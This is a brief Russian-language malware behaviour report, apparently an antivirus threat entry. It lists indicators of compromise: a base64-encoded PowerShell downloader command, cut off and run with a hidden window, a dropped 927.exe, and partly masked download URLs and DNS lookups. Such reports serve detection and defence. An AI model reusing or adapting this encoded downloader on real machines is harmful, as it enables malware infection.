Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAF8ANAA5AF8AXwA0ADYAPQAoACcAUwAnACsAJwBfADIAXwAwAF8AJwApADsAJABqADEANgAyAF8AMwAyADMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdABfADUANwBfADUAXwA9ACgAJwBoAH...
- %HOMEPATH%\927.exe
- %HOMEPATH%\927.exe
- 'po####verhotel.com':80
- 'bk#######tory.mdscreative.com':80
- 'hu###omains.com':443
- 'vi##52.com':80
- http://po####verhotel.com/wlaSpzROD
- http://po####verhotel.com/
- http://bk#######tory.mdscreative.com/aEPEdU126g
- http://vi##52.com/xWR3nltYA
- 'hu###omains.com':443
- DNS ASK po####verhotel.com
- DNS ASK de####perparrot.com
- DNS ASK bk#######tory.mdscreative.com
- DNS ASK hu###omains.com
- DNS ASK vi##52.com
- DNS ASK bv##.##tphamtamlinh.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAF8ANAA5AF8AXwA0ADYAPQAoACcAUwAnACsAJwBfADIAXwAwAF8AJwApADsAJABqADEANgAyAF8AMwAyADMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdABfADUANwBfADUAXwA9ACgAJwBoAH...' (со скрытым окном)